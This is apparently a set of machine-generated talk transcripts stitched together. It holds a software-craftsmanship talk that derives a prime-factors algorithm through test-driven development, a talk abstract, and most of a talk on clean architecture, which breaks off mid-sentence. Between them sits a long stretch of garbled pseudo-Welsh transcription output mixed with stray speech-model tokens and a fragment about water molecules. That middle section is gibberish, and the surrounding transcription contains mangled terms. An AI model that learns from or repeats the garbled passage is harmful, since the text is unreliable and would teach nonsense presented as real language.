won't give you the answers, but you can type in your answers and it will tell you if they're right or wrong. I sent him off to his bedroom and then I began to write this program in Ruby. I'll do it for you in Java. I sat down at my kitchen table and I thought about it for a minute. I said, how am I going to find the prime factors of an integer? And I thought to myself, well what I need is a list of prime numbers. If I have a list of prime numbers, then I could divide my candidate number by these prime numbers and any of them that divide evenly are a factor. And I'll just walk through the list of prime numbers up to some limit and that'll help me find all the prime factors. How will I compute the list of prime numbers? There's an old algorithm called the SIV of erratostinies. I'll use that algorithm to create an array of prime numbers and then I will divide through by the prime numbers. That's been perfectly reasonable to me. But I had been doing test-driven development for about five years so I was pretty new at it. And I thought to myself, wait, wait, wait. When you're doing test-driven development, you don't start with a big design. Since that time I've modified that slightly, I actually do start with big designs. I just don't believe them. So here I had a big design, big in some definition of the word big. And I thought, I'm not going to believe that design. I'm going to write the tests and let the tests lead me. And here's what happened. What you see here is the very first test right here. Note that the factors of one is the list with nothing in it. One has no prime factors. If I run this test, you will see that it fails because the factors function is returning in null. You can see that right here. Oops, sorry. You can see that right here. The factors of function takes an n, an integer, and it returns a null. I can make this pass by doing the simplest of changes. I'm going to take this null, which by the way is a very degenerate constant, and I'm going to transform it into a new array list of integers. And of course, it wants me to import that. And now if I run my test, my test should pass. I'm a programmer. I got it to pass. The burst of endorphins rations to your head, you know that you are a god. The machine is your slave. Time for the next test. The factors of two is the list with a two in it. The prime factors of two is just two. Oh, this fails, horror of horrors. How can I make this pass? I can make this pass by modifying my algorithm. And now watch this carefully. I still want that constant. I just don't want to return it. I'm going to have to modify it before I return it. So I'm going to transform this constant into a variable named factors. The constant is still there, but now it's held by an identifier named factors. And now I must modify that. I must put an if statement in. If n is greater than one. factors.add two. Ha! Now most of you are thinking, well, what kind of crazy nonsense was that? There's no design there. You're just hacking an if statement in. Watch what happens to that if statement. Watch what this if statement does. It's fascinating. Next test. The factors of three is a list with a three in it. This should fail. Notice now I'm getting into a hypothesis experiment loop. I write the test. I expect it to fail. That's my hypothesis. Ah, my hypothesis is correct. It fails. Ah, now I must make it pass. And to make this pass, we're going to play a game of golf. Golf in programming, in test driven development, is to make the test pass with the fewest key strokes possible. How do I make this test pass with the fewest key strokes possible? Two to n. Note that that was a change from a constant to a variable. A change from something specific to something more general. In fact, if you think carefully now, all the changes we have made to the production code have been a change towards generality. Every change has made the production code a little bit more general. I didn't have to do that. I could have put more if statements in. I could have said if n equals one, return a two. If n equals three, return a three. If n equals four, return a two and a two. I could have done that. But that would violate this new rule that we're beginning to smell. And the new rule that we're beginning to smell is this. With every new test, the tests become more and more constraining. The tests become more and more specific. Our response on the production code side is to make the production code more and more general. So everything we must do on the production code side must be a move towards generality. As the tests get more specific, the code gets more generic. Let's see if that works. Factors of four is a list with a four in it. No. Where are my pair programmers? The list with a two and a two in it. This should fail. Yeah, fails. How do I get that to pass? Well, if I look at this code here, I think, well, I can get this to pass by putting braces around this because I still need to know that n is greater than one. The only time I want to return an empty list is if n is equal to one. Then here I'm going to say if n is divisible by two, boy, do I hate that code, then I can add two. So if it's divisible by two, I will put a two in the list. And then, and then, and then, I will reduce n by two. So I pull the factor out of n, falling out of the loop. And I look at this and say four. Four will work because it's greater than one. It is divisible by two. I will put the two in the list. I will convert the four to a two, and I will put the second two in the list. And that will work. It doesn't work. Oh. But the test that failed was the test for the number two. Look at that code again. So I put a two in the list, if I am doing the prime factors of two, well, two is greater than one. Two is divisible by two. I will put the two in the list. I will convert the n to a one, and I will add it. I never want a one in there. So I'll put another if statement in. And now you are completely convinced that all I'm doing here is hacking away at this. You're just adding if statements. But that if statement is an interesting one. It's the same as the one above it. It's the same predicate. Now when you have two if statements in a row, in fact, I can make this a little more interesting. I can take this if statement. I can move it completely out of the loop. That still passes. So now I have two if statements in a row with the same predicate. And that should smell to you like an unwound loop. That last if statement looks like the end condition of a loop. But never mind. We have more tests to do. Factors of five is the list with a five in it, because five is prime. Pass or fail? Pass. That's nice. Okay. That factors of six is the list with a two and a three in it. Pass or fail? Pass. That makes sense though. Six is divisible by two. Take the two out, leaves the three, puts the three. Yep, works fine. Yep, good. Okay. Factors of seven is the list with a seven in it, because seven is prime. Pass, three in a row. Three in a row. As bad as that algorithm looks, there's something right about it. Oh, you'll see. He asked me when I know when to stop. You'll see. Oh, yeah. Don't worry about that. I didn't want that up there. Go and build. Thank you. They've changed the key bindings, nasty little people. All right. Next test. Factors of eight is the list with two and two and two in it. Eight is two cubed. This will fail. There's nothing in my code that will put three things in the list. Yes, it fails. It puts a two and a four in the list. That makes perfect sense. How can I get this to pass? And now we'll play another game of golf. How can I get this to pass with the fewest possible keystrokes? Recursing, he says. There's a faster way. If to wow. I sat at my kitchen table. I turned that if to a while. I saw it pass and a chill went down my spine. What happened there? And it occurred to me. A while is a general form of an if statement. An if is a degenerate form of a while loop. Again, this is a move towards generality. I have made the code more general simply by letting the if statement continue until it was false. That's interesting. Let's do nine. Nine is three cubed. That should fail because nothing will put a three in there two times. It does fail. Actually, it failed by sticking a nine in there. How can I make this pass? I look at this code and I realize that right here, I have a little engine, a little loop that factors out all the twos. Now I could repeat that loop like so. I will take a copy of that. And I will paste that copy in there and I will turn all the twos into threes. So now I have a loop that takes out all the threes and I believe that that will pass. Yes, but that violates my rule. Actually, it violates several rules. By duplicating that loop, I have not made the code more general. In fact, I've made the code more specific. It is now tuned to three. Secondly, I've duplicated code. That's bad. So I'm going to get rid of this. I know what I want to do now. I just need to do it in a more general way. And a more general way would be to put this code here into another loop. Modifying the two. So first thing I'm going to have to do is change that two to a variable named divisor. First thing I'm going to have to do is take this code here and put it into a loop. When will that loop end? When n is reduced to one. When I have found all the factors of n, n will have been reduced to one. So I will execute this loop while n is greater than one. Look what happened to that if statement. Of course, I need to take the initializer outside of the loop now. And I'd better increment that divisor. That works. Fascinating. Ah, but, but. There's some cleanup I could do here. Because this loop cannot, cannot exit until n is a one. Which means this if statement no longer applies. It really was the terminating condition on an unwound loop. There's a little bit of cleanup I can do here still. While loops are wordy, let's turn them into for loops. This one is a simple for loop. It has no initializer. It does have an incrementer. The incrementer is just that. Let me get rid of that. I think that works. Yeah, that works. Now I can get rid of those horrible braces. I am on a mission to destroy all braces. I know, I know you're supposed to put braces in around every if statement and every while loop. But I have a different view of this. I'm going to work hard to make every while loop and every if statement one line long and then they don't need braces. If you want to put the braces in, you put them in. Oh, I think I can change that to a for loop. And the initializer of that for loop is right there. And the incrementer of that for loop is right there. I think that will still work. And I don't need these ugly braces anymore. Let's get rid of those. Well, that's a nice pretty little algorithm, isn't it? I wonder how it works. Let's see if it does work. Okay, we need some big number with lots of prime factors. Two times two times three times three times five times seven times 11 times 11 times 13. That's a bunch of prime numbers. Is a list of, let's take that and move it down. And we'll say two comma two comma three comma three comma five comma seven comma 11 comma 11 comma 13. Oh, we're done. We're not actually done. Well, we're done. There's a small improvement you can make to speed the algorithm up in the case of very large prime numbers. You don't need to loop while n is greater than one. You can loop until n is greater than the square root of the original n. But and that'll speed things up by a fair bit in the case of very large prime numbers. Other than that, however, this is the algorithm. Notice that it has nothing to do with finding a bunch of prime numbers and dividing through by prime numbers. It's an entirely different algorithm. Where did this algorithm come from? Well, it came out of my brain, obviously. I was sitting at the kitchen table. I developed this algorithm one little test case at a time. It's not like it magically happened. And yet it did not come about because I thought it through. I did think it through. I just didn't think it through beforehand. I thought it through while I was developing it. One little test case at a time. This implies that it is possible to create algorithms incrementally, to solve algorithmic problems incrementally, one test case at a time, if you follow the rule that everything you do to the production code becomes more and more general. If you think about that long enough, you'll realize, yes, the tests get more and more constraining, the code gets more and more general. At some point, it gets general enough to pass every test. Is it possible to derive algorithms incrementally one test case at a time? In this case, it certainly was. Is it generally possible? Let's do a thought experiment. You and I? The sort algorithm. I'm going to hand you an array of integers. I want to know what test cases you would pose in order to pass a sort algorithm and what changes you would make incrementally to that sort algorithm to make them pass. We will begin. What is the very first test case? No integers at all, an empty array. We always start with the most degenerate case. The most degenerate case is an empty array. Sorting an empty array is trivial. How do you solve it? You return an empty array. Okay. First test case is now passing. Second test case. One integer doesn't matter what the integer is, it's already sorted. This fails. It fails our current implementation, which returns an empty list. How can we make it pass? Return the input array. Notice how similar that was to returning the N. We had a 2 at first, then we returned an N. In this case, we will return the empty array. Interesting. Now, we will return the input array. Next test case. Two integers in order. Passes. Next test case. Two integers out of order. Fails. How do we make it pass? Switch them if they're out of order. So there's an if statement. Oh, that's similar to this, isn't it? An if statement. And if that if statement fails, we swap them. Remember you said that. Right? Yeah. Remember you said that. Passes. Next test case. Three integers in order. Passes. Three integers with the first two out of order. Passes. Three integers with the second two out of order. Fails. How do we make this pass? By making the code more general. You put the if statement with the swap into a loop. And you loop through the array, swapping if they're out of order. Passes. Three integers in reverse order. Fails. Because you swapped the first two, you swapped the second two, but the first two are still out of order. How do you make that pass? Put the loop that compares and sorts into another loop. That's actually one element shorter. What have we invented? All sort. The worst possible sort algorithm. So maybe test driven development is a great way to derive terrible algorithms. But this guy here gave us an answer to one of those early test cases. Two elements out of order. And he said compare them and swap them. There was a different way to make that test pass. It was not necessary to compare and swap them. What you could have done instead is to compare them and then return wholly new arrays, allocate brand new arrays out of whole cloth and put the elements in the right order. Not changing the existing array, creating a new array. Those of you who attended my last talk will recognize that as the functional solution. Creating the elements inside the array is non-functional because we're using assignment to do it. Now, it turns out, and I won't do this derivation for you. I'll let you do this at home because it's fascinating. It turns out that if you take that course, you put in the if statement and you create completely new arrays, you very quickly wind up at a quick sort. The quick sort falls out. The quick sort is probably the best possible algorithm. So apparently, there are forks in the road. As you are writing tests, there are choices you can make. Maybe two or three different ways to make a test pass. And if you choose the right course, you get to a better algorithm. What criteria can we use to make that choice? And it turns out, there are a whole list of possible things that you can look for, but the first thing to look for is assignment. If your solution involves assignment, find a solution that does not. If no such solution exists, then you have to go on with assignment. But if you can do it without assigning, you may wind up at a better algorithm. This is called the transformation priority premise. The premise that production code can be transformed into ever more general states. And there is a priority to the order in which you make those transformations. You prefer transformations that don't have assignment in them. There's a whole bunch of other preferences. If you look up the transformation priority premise, you will see a list of these possible predicates that were used for transformations. You'll find the documents on this interesting. They cover the sort algorithm. They cover Fibonacci. They cover a bunch of algorithms. And it's something interesting to try on your own. Which brings me right to the end of the talk so I can take one question. Anybody out there want to ask a question? Yeah, in the back. So the cycle in test driven development is supposed to be red, green refactor. Yes, that's true. And your question was that sometimes my tests passed immediately. Yeah, that does happen from time to time. Sometimes you pose a test that you think will fail and it doesn't. It passes. Okay. Then you don't have to go through the rest of the cycle. You thought it was going to be red, it turned green. That's a benefit. It doesn't happen very often, but it does happen. And with that, thank you all for your attention. See you next time. Thank you.
|
Once you start to get good at TDD, you begin to learn the nuances of the discipline such as the fact that tests and code grow in very opposite directions. As the tests get more specific, the code gets more generic. You also begin to learn that in the red/green/refactor cycle there are just a few standard gestures that move a test from red to green. In this talk, Uncle Bob will discuss those gestures, called transformations, and will present the idea that they when applied in a particular order and priority they can have a profound effect on the resulting code. This one is at the bleeding edge of TDD research; and will leave you with something to ponder.
|
10.5446/50860 (DOI)
|
ti yw'n ddwellgynton, i'r gweithio mewn ossau yng Nghrun. Mae H unpack yn dda weld yma. Ond mae'r son o vérifoh. Traf ychydig iddo'r gwêr ar y ddweud I. E wedyn teulu, gan ddu? Yn ymwneud yw yw yw yw'r eich cyfnod? Yn ymwneud yw yw Adam. Mae ydych yn ymwneud yw yw yw. Yn ymwneud yw... Yn ymwneud yw yw... Yn ymwneud yw Roy Osherof. Yn ymwneud yw yw Adam. Mae yw yw Sadf Ginaidd, ville Girls். yw yw pr côngpodur mewn i'r prwst solution. Pe ni'n erbyn argyfod gynghwyl i'w cyffrin iawn. Mae fyf真edlaeth roi spele Abercodellu i lawyer звонen練ydd y shoutyserig hefyd. Breslawn letter o ganweithio. Mae'n mewn cyirad�paoli rai bod yma'n gymablem mewn ymlaen. Prestaf wahanol maen i'r g equalityll. Yn drych i roi grows. Ond ein un o'n iawn o'r partyll,iar hanion roi, sy'n barath wedi calliol plodfaed. groes cyd-eg shirwyd gan ceirion roedd y dra frogs cydedol gwreidur y cerddoriae. Bydd fyddai ar wgechyd. Genlyniadol gweithio gyma sayio, y bodas bei cyd-eg caveau'r r�kl. agill nesaf yêu gooitedを 지금 waw, ac mae waw wedi ei hoffio mewn dwyde400. daw y mot ei hoffio? Dwydecular waw? yw'r riv industrial. mae rw Grithrad myll complex, mae rw Princepan felfer o b ER a neun yn tar Stat treder, ond mae'r Princepan. mae erwyddon. mae'r Princepan fydd ty<|lt|><|transcribe|> laimbtavost, gundam daug laimbtavu. met Pleasekildeatt neulif sóninusiailio olderiu y Ac y 쿠fon hwn yn cael rheamp Dun L顆io. Gallwch o'r gwaethaf chefrhaiff, gallwch y rheamp Podold. Roedd nد canfziad hon. Roedd jeithio'n hy져ffig, ma aheadd am yr hyd ym 너무 inspector. Ballach y designers yn beth yw y prinsypa, mae'n una CD. Fyddwn ni ein rhunas mae hwn yn cael todul fuse求 thïeti troll a robin cael I midnios i strategyö, i et drinking y model ymaker a я rofacellwch a'r rhaid. Donw'r sgandwch i amny 해서ics Politikr. Felly'r fול yn 170 o gyn窳 am prosalt ar w cabaur Works. And rydw i73 o g scannerau roes iawn, roes iawn gweld. Baddologi'r re harpwyd unig, fe yw yw chemical sydd val beesbyn 찾 â'ch roedd eu bry Jonod, er diddask swipe, yr un groifant yng martyr i adnod eich gw Pis Charllys un ar yrames i ar heated prices bwysig yn trwy dylan, mae'n adeneu'r 8 branches, ac pharwy o'i hwylattog, os yw'r bobl gweld eu gweld yn�้ว han iddi armau BUR Y Lwver Feathri-'Iogen iThagol i'r rhagliaeth camellu fan hyn. Pan oedd eu Holly Gorre Has chi ddal aimech gyfan am yr hwn? Bwysig yn han hwn sydd dylyn wahanol arall ar y dwi'r sgrifion. Ac bod, ar twre trebeat hwn ag erioed Incóa. Bwrwdydd wedi'i hefyd o holl windchesterf. Rydyn ni'n golygu. Fasenadwch yn ystod. Felly dywedd? Rydyn ni'n golygu hydergyn, rydyn ni'n golygu hydergyn. Mae'r hollwch yn ychydig. A dyna'r rhaid? Mykimau. Rydyn ni'n golygu hydergyn yn y ddod, ac rydyn ni'n golygu hydergyn yma'r hyn. Mae'r ysgol yn y rhaid o'r ddod o'r rhaid o'r hyn. Mae'r rhaid o'r hyn o'r ddod o'r hyn o'r hyn o'r hydrgyn sy'n gwybod. Rydyn ni'n golygu hydergyn, rydyn ni'n golygu hydergyn. Mae'r hydrgyn yn y ddod o'r hyn o'r hydrgyn sy'n gwybod. Mae'n golygu hydergyn, yr hyn o'r hydrgyn yma, i gyfael amser nesaf i gyd, a you think of the electrons as waves, not particles. Then where would those waves like to be? And those waves would like to be mostly between the protons, the proton and the hydrogen atom and the protons and the oxygen atom. So they will congregate, those electron waves will congregate more between the two atoms, between the three atoms actually, than everywhere else. They still go everywhere else. míll ychydig yn cofailo ar s pouvain. A lle oherwydd'iol Ch Scripture wedi'i sra slipu mewn cyfl Casol ac NYL Y brypled felly oherwydd wrth felly Parce sef �asında White a plate oherwydd Tor퍼 sy'n golaw da oherwydd sra squeliffau Ayuan a'r cyfl H seemnau. Yn dwylo'r cyfl Limeui yn pr mainland o hra jo. Y Tomatoa bron, mae'r ddweud a'r bwyr allan ynghylch i oes! ar uch參. Rha touson gan dad hyn ma unused ym 1970, rhod wedi bod y lemon efallai gallwn hefyd yn byw venue, yn gyttig yn ei O fyrdwch ynghyd arnu complicatedd ac mae yn maen am gyd<|zh|><|transcribe|> co afydwyd, fyrdwch gwrsotgl lyndidd Greenllai i digyn Cymru Roeddfanydd ei w 1920 gyda'r awrfziaid thin Faw comfyol mae'r fully shots ar наllwydd i bwysig ac eich fawr pa wneud yn wychi drafodaid ond mae fe bwysig bhwysig antwch arnaeth gwir o gwain publish the stream of water in watch the water bend toward the blue is all the water molecules turned around and get attracted to the electric charge. Of course that's not what we're supposed to be talking about. The name of the talk I'm about to give you is called architecture the lost years at the talk I've been doing now for several years. It's about. The next step after clean code after clean gweithwch crea близ да gyda'r cynllun drwy hwnnw klw glow yn cy nagyon neu weithbiol. Cdwn i'r cedlo maen nhw, eraill y wneud dit lizardio a dynychod yn ASMR. Yn gyfer y sp pursue ond mogen wneud siat bobraeth own a yard потому,mans honol rydym ni yn cynh pins Żad Caewchım, ardal yn gyhoeddol roedd un i neu ro wneud fyd... Wal hanquodwch am y pinc ar neu trw wyまず. I was learning rails at the time and I wrote this application and it was, I followed the book, right, you get the books out, you follow the book, you follow all the recommendations of the book and that's what I wound up with. And I was happy with that and I put the application away and I didn't look at it again for a very long time. Then about three years ago, my son at my request wrote an application and I looked at it and I saw that. Same directory structure. These were two completely different applications. They had nothing to do with each other, but they had the same directory structure and I looked at it and I thought, wait, why do these two applications have the same high level directory structure? They're two completely different applications and it occurred to me that they had the same directory structure because they were both rails applications. And I asked myself, okay, but why is that important? Why is rails or any framework so important that it would dominate the high level directory structure of an application? And the reason I asked that question of myself was because of this. The web is a delivery mechanism. The web is an IO channel. The web is not architecturally significant. We think of ourselves as writing web applications. We're not writing web applications. We're writing applications that happen to deliver their content over the IO channel known as the web. And why should that IO channel dominate us? Does anybody remember when the web became important? 98, 99? Anybody remember what a change that was? How radically different everything was? Except that it wasn't. Because we weren't really doing anything new. We were just gathering input from an input source, processing it, and spitting it out to an output source. That's all the web is. Why would the web dominate so much? So I started thinking about architecture. And I started looking at blueprints. There's a blueprint. And if you didn't have the word library staring at you, it wouldn't take you long to figure out that it was a library. Because it's obviously a library. You've got a bunch of bookshelves in there. You've got a bunch of reading tables. There's little computers sitting on tables. There's an area up front where you have the desk where you can borrow or return books. It wouldn't take you long to look at that and think, hmm, that must be something like a library. Or, here's another one. That's a church. It's obviously a church. Oh, you might mistake it for a theatre. Theatres and churches do have a certain synergy to them. But no, this is definitely a church. The pews, the altar, the classrooms around the outside, the greeting area around the front. This is clearly a church. The architecture of these buildings is not telling you how they're built. The architecture of these buildings is telling you what they are for, their intent. Architecture is about intent. And the high-level structures of those rails apps were not communicating intent to me. They were telling me that they were rails apps. There's something wrong with that. And then it occurred to me. This is a known problem. It's a solved problem. It was recognized and solved by Ivar Jacobson in 1992 when he wrote this book. Who's got this book? Anybody read this one? I've got a guy here. Anybody else? Objectarian in software engineering? A few of you. Wonderful book. It's 1992. It's a little bit old, but it doesn't matter. The principles inside it are still perfectly good. Notice the subtitle. The subtitle says, a use case-driven approach. Who remembers use cases? See, it was very popular in the early 90s. Big, big deal. In fact, it was so popular that it was utterly destroyed by all the consultants who invaded the realm and ruined what use cases were supposed to be. You may recall, if you remember that era, that one consultant after another would publish on the internet their own particular format for a use case. And the format became all important. We had PDFs that were out there that forced you to fill in the blanks of a standard use case form. And you had to fill in the name of the use case and the inputs to the use case and the preconditions and the post conditions and the primary actors and the secondary actors and the tertiary actors. What the hell is a tertiary actor? You had to fill in all this stuff and the whole problem of use cases became one of form instead of one of function. And right about the peak of that era, the agile movement began and we stopped talking about use cases and we started talking about stories and the whole use case thing fell on the floor and nobody talked about it again. And so I brought it up again and I read through the manual again, the book again, and I remembered what Yachobson wrote. Here is a use case, typical of what the kind of use case that Yachobson would have written. If you notice it has very little form, oh a little bit, it's got a name up there, create order. Imagine that this is a use case for an order processing system. And it's got some input data like the customer ID and the customer contact information and the shipment destination. Notice that I am not supplying any details. I'm not saying what the customer ID is, whether it's a number or a string, I don't care. I'm not saying what the customer contact info is. I assume it's got a name and a date and an address and a few other things, but I don't care. I'm not trying to specify detail here. And then you've got the primary course and the primary course is the set of steps that the computer will undertake to satisfy the use case. These are the processing steps. And the first one is that the order clerk issues the create order command. That's actually not something the computer does. And then the second step is the system validates all the data. Notice I don't say how. Just validate it somehow, it doesn't matter. The third step is the system creates the order and determines the order ID. I presume that's some kind of database operation, but I'm not going to say that here. And the fourth step is that the system delivers the order ID to the clerk, probably on a web page, but I'm not going to say that. In fact, this whole use case says nothing about the web. This use case would work no matter what the input output channel was. I could make this use case work on a console app, a desktop app, a web app, a service-oriented architecture app, an iPhone app, it doesn't matter. Because the use case is agnostic. It doesn't care about the I O channel. Jacobson said, you can take that use case and turn it into an object. He called the object a control object. I've changed the name to an interactor to avoid confusion with model view controller. Maybe I should have changed the name to use case, but I didn't. Interactor is what I've written here. The interactor object implements the use case. It takes as its input the use case input. It delivers as its output the use case's output. And it implements at least at a high level the rules, the processing steps of the use case. Notice there's a caption below there. It says, interactors have application-specific business rules. There are two kinds of business rules. There are the kinds of business rules that are global. They are true no matter what the application is. They are application-independent business rules. And then there are other business rules that are tied to the application you are writing. So, for example, let's say that we've got an order entry application and an order processing application. Two completely different applications. Both of them might have an order object, and that order object might have common business rules, regardless of which of the two applications you are inside. But only one of those applications would have an insert order use case. So, use cases are application-specific. They are bound to the particular application they are in. Business rules that are not application-specific are bound to entity objects. Some people would call these business objects. I don't like the term, so I'll call them entities. That's what Yachymson called them as well. You put all of the application-independent business rules into your entities, and the interactor will control the entities. Then you have to figure out a way to get the input and the output out of the use case, into and out of the use case. We do that in this case with interfaces. I have drawn these as object-oriented interfaces. Notice that the interactor uses one of the interfaces and derives from the other. The one it derives from is the input interface. The one it uses is the output interface. Notice that the arrows point in the same direction. That's important. We'll come to why that's important in a minute. So, these are the three objects that Yachymson identified as part of his architecture for applications. Now, let's trace this through. Let's see how it would work. This is a typical application. I've got some user out there. That's that little man standing there. That's an actual real person. That real person is interacting with the system through some delivery mechanism. Maybe it's the web. Maybe it's not. Who cares? The person, the user, pushes some buttons or types on the keyboard or does something that stimulates the system to accept data. A delivery mechanism, maybe it's the web, maybe it's something else, doesn't matter, translates that into the creation of something called a request model. A request model is a pure data structure. A plain old.NET object or a plain old Java object, a raw data structure. It has no idea where the data came from. There's no trappings of the web. If there's any trappings of the web anywhere. It's just a plain old data structure. No methods on it. No nothing. A bunch of public elements in a data structure. It contains all the input data. That gets passed into an interface, the input boundary interface, which the interactor derives from. The interactor receives the request model and reads it and interprets it and turns it into a set of smaller commands which it sends to the entities. All the little business objects out there. It controls the dance of all the method calls to the entities. Once the job is done, then it reverses the flow. It queries those entities and says, okay, what happened to you? As a result of that, it builds up yet another data structure called the result model. The result model is still just a plain old data structure. Nothing new about it. Just an old plain old.NET or Java object, a bunch of public fields. No methods. That result model gets passed through the output boundary to the delivery mechanism where it gets displayed somehow to the user. That's the flow of just about any application. Could you test that interactor? Be easy, wouldn't it? Create the input data structure, invoke the interactor, look at the output data structure. Do you have to have the web server running to do that? No, because the interactor is just a plain old Java object or a plain old.NET object. So are all the data structures. Do you have to have the database running to do that? Well, you might, but we'll deal with that in a minute. I can test this without the delivery mechanism in place at all. If my delivery mechanism is the web, I don't care. I don't have to have the web server running. I don't have to test it with web pages. I can test the functioning of the system without going all the way from the inputs to the outputs. What about MVC? Isn't MVC the thing we're all supposed to be doing? What does MVC stand for? Model View Controller, who invented it. That guy. And now I'm going to completely mispronounce his name and you can probably say it better than I. But I'm going to call him Trig Virene's Cawg. You can probably say it better than me. I met him once. This is the guy who invented Model View Controller in the late 1970s. I met him once. I met him here at this conference two years ago. I was up in the speakers lounge and I was hunting for a power outlet. And this old guy walks up to me and hands me a power outlet and I look up and it's Trig Virene's Cawg. And as he handed me the power outlet, our fingers touched. I haven't washed that hand. It's Trig Virene's Cawg. Some people came up and took their picture with me today. I'm a fanboy too. In the early 80s, late 70s, Trig Virene's Cawg came up with this structure. It's called Model View Controller. He did this in the small talk platform. And the idea behind it was very simple. You've got a model object. The model object contains your business rules. It does not know how it's displayed. It does not know where the input comes from. It's pure business rules. Nothing more. There's a controller down there. The controller handles all the input. The job of the controller is to look at whatever the input device is. Keyboard doesn't matter. And translate the actions of the user into commands to the model. Then you've got the view. And I've drawn the view with that funny double arrow. That's an observer relationship. The view registers with the model. And whenever the model is changed, it calls back to the view, telling the view to re-display. The job of the view is to display or represent or somehow convey the contents of the model to something else. It works nicely on a graphical user interface. It also works just as well on a console device or a service-oriented architecture or any other kind of application you wish. You have something that controls input, something that controls process, something that controls output. This, probably the very first named design pattern ever, was meant to be used in the small. You would have a model view controller for a button. You'd have a model view controller for a checkbox. You'd have a model view controller for a text field. We did not have model view controllers for a screen. Since those early days, this has been twisted and warped and turned because, like anything in software, if it turned out to be a good idea, everyone else will copy it and use the same name for something completely different and call it good. This happened with OO, it happened with structured, it happened with objects, it happens with agile, it happens with anything. If the name is connected with something good, then someone else will connect the name with their stuff and try and call it good. That's what happened with MVC now. Nowadays, we have these MVC frameworks. They don't look anything like that. They're not model view controller in the sense of a trig v aren's count model view controller. They're something very different. They kind of look like this. Here you've got a bunch of controllers up there. Now, the controllers, if we think of the web, the controllers are somehow activated by the web framework in the sky. The web framework in the sky, whatever it is, who cares, rails or spring or God knows what, will somehow route the complicated and horrible URLs that come from the web to a set of functions that we call controllers. It will pass into those controllers the arguments and the data that came from the web. Those controllers will then reach over and start yelling at the business objects, telling the business objects what to do. Then they'll gather the data from the business objects and talk to the views. The views will then reach back into the business objects and gather a bunch of data out of them and present them. What you wind up with are business objects that get polluted with controller-like functions and with view-like functions. It's hard to know where to put the different functions. Sometimes they go into the business object when they really shouldn't. How can we deal with the output side? Here I show you the Interactor. The Interactor has done its work. It's gathered the data from the entities, the job of the use cases done, the response model has been built. We're about to pass the response model out through the output boundary. What implements that output boundary? Something called a presenter. The job of the presenter is to take that response model, which, remember, is a pure data structure. To translate it into yet another pure data structure, which we could call a view model. The view model is a model of the output, the representation of the output. It's still a data structure. But if there is a table on the screen, there will be a table in that data structure. If there is a text field on the screen, there will be a text field in that data structure. If the numbers on the screen need to be trimmed to two decimal places, they will be trimmed to do two decimal places and converted into strings in the view model. If they need to have parentheses around them, if they're negative, those parentheses will have been put on them by the presenter and put into the view model. If there are menu items, the names of those menu items are in the view model. If some of those menu items need to be grayed out because they're inactive, there are booleans in the view model that tell you that they should be grayed out. Anything displayable is represented in the view model data structure in a displayable but still abstract way. Then that gets fed to the view. The view is stupid. The view doesn't have anything to do. It just takes all the fields from the view model, puts them wherever they have to go. Boom, boom, boom, boom. No processing, no if statements. There might be a while loop to load up a table, but that's about it. The view is too dumb to worry about. We don't usually even bother about testing the view because we're going to look at it with our eyes anyway. Can you test that presenter? Yeah, you hand it the data structure of the response model and you look to get the view model data structure out. You can test that presenter. Do you need the web server up and running to test the presenter? No. You can test all this stuff without the web server running. You don't have to fire up spring or whatever. God knows other container you've got. You don't need to fire up all this goop. You test all this stuff just like they're little old objects. By the way, that's a goal. You want to test as much as you can test without firing up anything. You don't want to have to start this server, start that server, start this thing, or start that thing which takes 30 seconds or two minutes. You don't want to have to do any of that. You want to just be able to run your tests just like that. Boom, boom, boom, boom. Fast as you can. There's the whole piece from the interactor out. You can see the interactor takes data in from the request model through the input boundary, delivers data through the output boundary, through the response model into the presenter. And now look at that black line. That black line is the line that divides the delivery mechanism from the application. And notice that every arrow crosses that black line pointing towards the application. The application knows nothing about the controller or the presenter. It knows nothing about the web. It knows nothing about what that IO channel is. The IO channel knows about the application. The application does not know about the IO channel. If you were to put them into separate jar files, there would be no dependence from the application jar file upon the web jar file. And that also is a goal. You would like to be able to put them in separate jar files so that you could have a jar file for the web and a jar file for your application. And maybe another jar file for some other IO mechanism. And the only way that you would change IO mechanisms is simply to swap out jar files. Think of the IO mechanism, the web, as a plug-in. How many of you use... That was a dotnet shop, isn't it? You guys are all dotnet, aren't you? Who's dotnet? Yeah, yeah, yeah, yeah. What IDE do you use? Yeah. Do you have any plug-ins? So, a plug-in. Which of the two authors, the author of the IDE and the author of the plug-in, which of those two authors knows about the other? The plug-in authors know about the IDE authors. The IDE authors don't know anything about the plug-in authors. Don't care. Which of the two can harm the other? Can the plug-in author harm Visual Studio? Who's using Resharper? Can the Resharper guys, the JetBrains guys, can they harm Visual Studio? Well, they can break it. But can they harm it in a way that the authors of Visual Studio must respond to? The software developers at Microsoft, will they ever respond to JetBrains? No, they don't care about JetBrains. Any developers at Microsoft force the developers at JetBrains to respond to them? Yeah, big time. Now, think about that from your application's point of view. Which parts of your application do you want to be protected from other parts? Which parts do you want to be forced to respond to changes in the other, and which parts do you not want to be forced to change in response to the other? And the answer to that ought to be very, very clear. You would like to protect your business rules from changes to the web. You don't want to protect the web from changes to the business rules. But changes on the website should have no effect at all on the business rule side. That's what that architecture guarantees you, all those dependencies point inwards, towards the application. Keep that in mind, that is the plug-in architecture. Which leads us to the database. What about the database? Is that your view of the database? Do you think of the database as the great God in the center with little minions around the outside being applications? Does anybody have the job function of a DBA? Do we have DBAs in the room? I'm safe, good. Anybody know about the DBAs who lord it over the applications, panned out the schema, make sure that the database is right? Is this how you think about the database? Because here's my point. The database is a detail. It's not architecturally significant. The database is a bucket of bits. It is not an architecturally significant element of your system. It has nothing to do with the business rules. God help you if you are putting business rules into stored procedures. What goes into stored procedures are enhanced queries, their validations, their integrity checks, but not business rules. Why do we have databases? Where did this whole database thing come from? Why is there Oracle? Where did we store all that data? We stored it on spinning disks. Has anybody written a disk driver? Anybody written the software that controls memory in and out of a spinning disk? Nobody. Oh gosh. No, no, no. Yeah, disk driver. What? Diskat. What's good enough? So getting data in and off of a disk is hard. Why is it hard? Because of the way the data is organized on the disk. The way the data is organized on the disk is in these circular tracks. These circular tracks go around the surface of the platter. There can be many platters. There are heads that move in and out to find a track. So you've got to move the head to the right track, then the disk spins around and you've got to read the data off the disk. You try to get to the sector you want. There might be 50 or 60 sectors around the surface of a track. Each of those sectors might have 4K bytes. So you've got to wait for the disk to spin around until your sector comes. Then you've got to read that sector, and then you can go into that sector and find the byte you want. That's a pain. And it's slow. And if you don't optimize it, it can take forever to get anything in and off the disk. So we wrote systems that optimized for that particular problem. We call them databases. But something's happened. See my laptop there? My laptop has half a terabyte of solid state memory. It doesn't have a disk. That shouldn't be a surprise to you. Does anybody have a disk in the room? Is there a 